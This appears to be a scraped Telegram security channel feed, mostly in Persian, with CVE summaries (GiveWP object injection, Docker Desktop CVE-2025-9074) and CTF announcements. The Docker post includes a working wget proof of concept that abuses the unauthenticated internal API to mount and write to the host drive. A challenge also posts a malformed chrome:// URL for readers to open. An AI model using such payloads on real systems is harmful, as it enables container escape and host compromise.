CVE-2024-12877-week-66.pdf
1002 KB
🎯 CVE-2024-12877 Review – GiveWP goes unserialize()… Hello RCE! ⚡️🔥
Hello hackers, bug hunters, and curious minds! Welcome to Episode 66 of the GO-TO CVE series! 🎙💻
This week we’re cracking open a classic PHP Object Injection inside GiveWP, one of the most popular WordPress donation plugins. 🕳🐘
🔹 Week: 66
🔹 CVE: CVE-2024-12877
🔹 Type: PHP Object Injection
🔹 Target: GiveWP (WordPress Plugin)
📌 What’s the story?
GiveWP uses PHP’s notorious unserialize() on user input. That means attackers can drop in a crafted serialized payload, and PHP will happily invoke magic methods like __wakeup() — executing attacker-controlled logic without warning.
👾 What’s the impact?
Remote Code Execution (RCE) 🚀
Sensitive data theft (donors, users, configs) 🕵️♂️
Privilege escalation across WordPress 🔑
Full server compromise ☠️
💡 Lesson learned: Regex checks won’t save you. The real fix? Never unserialize untrusted input.
📬 Stay tuned with GO-TO CVE for a fresh bug every week:
👉 https://news.1rj.ru/str/GOTOCVE
#week_66
Hello hackers, bug hunters, and curious minds! Welcome to Episode 66 of the GO-TO CVE series! 🎙💻
This week we’re cracking open a classic PHP Object Injection inside GiveWP, one of the most popular WordPress donation plugins. 🕳🐘
🔹 Week: 66
🔹 CVE: CVE-2024-12877
🔹 Type: PHP Object Injection
🔹 Target: GiveWP (WordPress Plugin)
📌 What’s the story?
GiveWP uses PHP’s notorious unserialize() on user input. That means attackers can drop in a crafted serialized payload, and PHP will happily invoke magic methods like __wakeup() — executing attacker-controlled logic without warning.
👾 What’s the impact?
Remote Code Execution (RCE) 🚀
Sensitive data theft (donors, users, configs) 🕵️♂️
Privilege escalation across WordPress 🔑
Full server compromise ☠️
💡 Lesson learned: Regex checks won’t save you. The real fix? Never unserialize untrusted input.
📬 Stay tuned with GO-TO CVE for a fresh bug every week:
👉 https://news.1rj.ru/str/GOTOCVE
#week_66
🔥8❤3👍2👏1
https://news.1rj.ru/str/CVEdb چنل دوم ما رو دنبال کنید عزیزان اگه دوست دارید اپیزود هارو یک جا ببنید
Telegram
CVEdatabase
This channel archive 1️⃣ day exploits and custom exploit for CVE.
👍1
Forwarded from HackMeLocal
🕹 یک مینیچالش جدید داریم!
این مدت احتمالاً دیدین که بعضی دیتاهای یه ربات تلگرام لیک شده.
اما این یعنی تلگرام آسیبپذیره؟
(فکررررررر نکنمممم 😏)
برای همین یک شبیهسازی ساختیم تا خودتون ببینید دیتاهایی که از رباتها لیک میشن به چه صورت به دست میان.
یک ربات مخصوص رایگیری ساختیم:
@HML_Simulation_BOT
تو این ربات سه شخصیت برای رأیگیری آماده هستن:
🦆 DuckMen
🐺 Wolfy
👴 Just a random old man
میتونید هر چند بار که بخواید رأی بدید.
ولی این همه ماجرا نیست…
⚠️ یه آسیبپذیری توی سیستم رأیگیری قایم شده که میتونه لیست ادمینها رو لو میده.
ما نمیدونیم دقیقاً چجوری ادمینهامون لو میرن، اما اولین نفری که آسیبپذیری رو پیدا کنه و گزارش بده، رایتآپش به اسم خودش داخل سایت و کانال منتشر .
@HackMeLocal
#BugBounty #TelegramBot #Vulnrability #CTF #HackMeLocal
این مدت احتمالاً دیدین که بعضی دیتاهای یه ربات تلگرام لیک شده.
اما این یعنی تلگرام آسیبپذیره؟
(فکررررررر نکنمممم 😏)
برای همین یک شبیهسازی ساختیم تا خودتون ببینید دیتاهایی که از رباتها لیک میشن به چه صورت به دست میان.
یک ربات مخصوص رایگیری ساختیم:
@HML_Simulation_BOT
تو این ربات سه شخصیت برای رأیگیری آماده هستن:
🦆 DuckMen
🐺 Wolfy
👴 Just a random old man
میتونید هر چند بار که بخواید رأی بدید.
ولی این همه ماجرا نیست…
⚠️ یه آسیبپذیری توی سیستم رأیگیری قایم شده که میتونه لیست ادمینها رو لو میده.
ما نمیدونیم دقیقاً چجوری ادمینهامون لو میرن، اما اولین نفری که آسیبپذیری رو پیدا کنه و گزارش بده، رایتآپش به اسم خودش داخل سایت و کانال منتشر .
@HackMeLocal
#BugBounty #TelegramBot #Vulnrability #CTF #HackMeLocal
🔥12❤3
GO-TO CVE
CVE-2024-12877-week-66.pdf
کاش کانال های ایرانی حداقل از همدیگه حمایت میکردن ( چند تا عزیزان همیشه حمایت میکنن دمشون گرم ) سر همینه فعالیت خارجی رو بیشتر دوست دارم چون واقعا برای محتوا ارزش میزارن
👍17❤5👎1
چالش اعتماد
chrome://gpu?b=%%%%%%%%%%%%%%%%%%
اگه یکی همچین چیزی رو بهتون بده اجراش میکنید !؟ ( تو کروم باز کنید )
chrome://gpu?b=%%%%%%%%%%%%%%%%%%
اگه یکی همچین چیزی رو بهتون بده اجراش میکنید !؟ ( تو کروم باز کنید )
👍5🦄3
Forwarded from pooriya
تعصب داشتن روی چیزی بنظرم خوب نیست
روی لینوکس خیلی از برنامه هارو نداری
روی لینوکس خیلی از برنامه هارو نداری
👍7❤1👎1
امشب تو یه لایوی با بچه ها کار میکردیم
یه سابدامین پیدا کردیم که روش ollama آورده بودن بالا بدون auth میتونستیم همه کار انجام بدیم مثلا model جدید بیاریم بالا رو سرور طرف
مدل های دیگه رو حذف کنیم و این حرفا
به نظرتون باگه؟
اگه آره severity چند میشه
و آیا میشه باگه رو اسکلیت کرد مثلا به مدل هاش بگیم کامند ران کنه یا هرچی
یه سابدامین پیدا کردیم که روش ollama آورده بودن بالا بدون auth میتونستیم همه کار انجام بدیم مثلا model جدید بیاریم بالا رو سرور طرف
مدل های دیگه رو حذف کنیم و این حرفا
به نظرتون باگه؟
اگه آره severity چند میشه
و آیا میشه باگه رو اسکلیت کرد مثلا به مدل هاش بگیم کامند ران کنه یا هرچی
❤3
Forwarded from Xero Notes
🐋 آسیبپذیری CVE-2025-9074 در Docker Desktop
اخیرا از آسیبپذیری جدیدی در Docker Desktop با شناسه CVE-2025-9074 کشف شده است که به مهاجمین این امکان را میدهد تا از داخل کانتینرها به سیستم میزبان دسترسی پیدا کنند. این آسیبپذیری به دلیل دسترسی بدون احراز هویت به API داخلی Docker بوده و به راحتی میتوان با استفاده از یک درخواست HTTP ساده، دسترسی کامل به سیستم میزبان پیدا کرد.
💥 این آسیبپذیری چطور به وجود آمده است؟
در Docker Desktop نسخههای قبل از ۴.۴۴.۳، هر کانتینری میتوانست به API Docker با آدرس h
💠 نمونه کد برای آزمایش آسیبپذیری
ابتدا یک کانتینر Alpine بسازید.
سپس با استفاده از پیلود زیر، آسیبپذیری را تست کنید.
این پیلود با ارسال یک درخواست HTTP به آدرس زیر،
یک کانتینر جدید با دستور
📊 امتیاز CVSS
این آسیبپذیری دارای امتیاز CVSS 9.3 (بحرانی) است و در وکتور CVSS زیر قرار میگیرد:
✅ راهحل
این آسیب پذیری در نسخه Docker Desktop ۴.۴۴.۳ برطرف شده است.
🔗 https://nvd.nist.gov/vuln/detail/CVE-2025-9074
#DockerSecurity #CVE #DockerDesktop
@Xero_Notes
اخیرا از آسیبپذیری جدیدی در Docker Desktop با شناسه CVE-2025-9074 کشف شده است که به مهاجمین این امکان را میدهد تا از داخل کانتینرها به سیستم میزبان دسترسی پیدا کنند. این آسیبپذیری به دلیل دسترسی بدون احراز هویت به API داخلی Docker بوده و به راحتی میتوان با استفاده از یک درخواست HTTP ساده، دسترسی کامل به سیستم میزبان پیدا کرد.
💥 این آسیبپذیری چطور به وجود آمده است؟
در Docker Desktop نسخههای قبل از ۴.۴۴.۳، هر کانتینری میتوانست به API Docker با آدرس h
ttp://192.168.65.7:2375 دسترسی داشته باشد بدون اینکه نیاز به احراز هویت برای استفاده از آن داشته باشد.. با استفاده از این دسترسی، مهاجم میتواند یک کانتینر جدید با دسترسیهای ویژه راهاندازی کرده و در نهایت به فولدر C: در سیستم میزبان دسترسی پیدا کند. لازم به ذکر است که این آسیب پذیری در نسخه مک نیز قابل استفاده است و امکان دسترسی روت را برای مهاجم فراهم میکند.💠 نمونه کد برای آزمایش آسیبپذیری
ابتدا یک کانتینر Alpine بسازید.
docker run -it alpine /bin/sh
سپس با استفاده از پیلود زیر، آسیبپذیری را تست کنید.
wget --header='Content-Type: application/json' \
--post-data='{"Image":"alpine","Cmd":["sh","-c","echo pwned > /mnt/host_root/pwn.txt"],"HostConfig":{"Binds":["//c/host_root:/mnt/host_root"]}}' \
-O - http://192.168.65.7:2375/containers/create > create.json
cid=$(cut -d'"' -f4 create.json)
wget --post-data='' -O - http://192.168.65.7:2375/containers/$cid/start
این پیلود با ارسال یک درخواست HTTP به آدرس زیر،
192.168.65.7:2375/containers/create
یک کانتینر جدید با دستور
echo pwned > /mnt/host_root/pwn.txt میسازد و با استفاده از قابلیت Volume در Docker، مسیر C:/host_root را به mnt/host_root/ در داخل کانتینر مپ میکند.📊 امتیاز CVSS
این آسیبپذیری دارای امتیاز CVSS 9.3 (بحرانی) است و در وکتور CVSS زیر قرار میگیرد:
CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
✅ راهحل
این آسیب پذیری در نسخه Docker Desktop ۴.۴۴.۳ برطرف شده است.
🔗 https://nvd.nist.gov/vuln/detail/CVE-2025-9074
#DockerSecurity #CVE #DockerDesktop
@Xero_Notes
❤14
برای سلامتی پدر یکی از عزیزان دعا کنید درگیر مریضی سختی هستن ( انشالله خدا سایه پدر و مادر هارو بالای سر بچه هاشون نگه داره ) 🙏❤️
❤106👍2🙏2
Forwarded from HackMeLocal
سورس ربات تلگرامی که برای شبیهسازی آسیبپذیری SQL Injection ساخته شده، روی گیتهاب منتشر شد 👇
https://github.com/e1l1ya/telegram-bot-sqli-simulation/
اگر براتون جالب بود، خوشحال میشم با ⭐️ دادن به ریپازیتوری از این پروژه حمایت کنید 🙌
همچنین تجربهی کشف و شبیهسازی این باگ رو به صورت کامل در یک مقاله روی مدیوم نوشتم:
https://medium.com/@e1l1ya/how-i-found-sql-injection-in-a-telegram-bot-and-built-a-simulation-41ed994c4c03
#Simulation #SQLi #TelegramBot
@HackMeLocal
https://github.com/e1l1ya/telegram-bot-sqli-simulation/
اگر براتون جالب بود، خوشحال میشم با ⭐️ دادن به ریپازیتوری از این پروژه حمایت کنید 🙌
همچنین تجربهی کشف و شبیهسازی این باگ رو به صورت کامل در یک مقاله روی مدیوم نوشتم:
https://medium.com/@e1l1ya/how-i-found-sql-injection-in-a-telegram-bot-and-built-a-simulation-41ed994c4c03
#Simulation #SQLi #TelegramBot
@HackMeLocal
GitHub
GitHub - e1l1ya/telegram-bot-sqli-simulation
Contribute to e1l1ya/telegram-bot-sqli-simulation development by creating an account on GitHub.
🔥15❤4🙏2
امتحان فردا و شنبه رو پاس بشم یعنی رسما 😂 کار عجیب غریب کردم
😴12❤2👍2